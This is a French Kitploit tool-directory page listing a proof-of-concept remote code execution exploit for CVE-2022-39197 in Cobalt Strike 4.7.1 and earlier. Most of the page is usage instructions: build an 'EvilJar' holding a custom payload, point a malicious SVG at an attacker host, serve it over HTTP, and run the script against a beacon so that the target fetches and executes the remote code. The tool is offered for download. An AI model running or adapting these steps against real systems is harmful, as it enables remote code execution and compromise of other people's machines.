Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-39197 — Exploit de preuve de concept pour CVE-2022-39197, permettant l'exécution de code à distance contre CobaltStrike <= 4.7.1 via une charge utile SVG malveillante servie sur HTTP. | Kitploit
Outils/GitHubGitHub/its-arun/cve-2022-39197
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubits-arun/cve-2022-39197

CVE-2022-39197

Exploit de preuve de concept pour CVE-2022-39197, permettant l'exécution de code à distance contre CobaltStrike <= 4.7.1 via une charge utile SVG malveillante servie sur HTTP.

Voir le dépôt
3877514il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-39197 RCE POC

Utilisation

  • Préparer le payload
  1. Modifiez la ligne 19 avec votre payload dans EvilJar/src/main/java/Exploit.java
  2. Compilez avec jar mvn clean compile assembly:single
  3. Déplacez EvilJar-1.0-jar-with-dependencies.jar de EvilJar/target/ vers le dossier serve/
  4. Modifiez serve\evil.svg et remplacez [attacker]
  5. Servez le contenu avec
python3 -m http.server 8080
  • Exécuter l'exploit
root@kitploit:~
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg

Le payload sera déclenché dès que l'utilisateur fera défiler la liste des processus.

POC.JPG ?

1.jpg

Liens de référence

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Il y a une excellente analyse approfondie de cette vulnérabilité https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Télécharger l’outil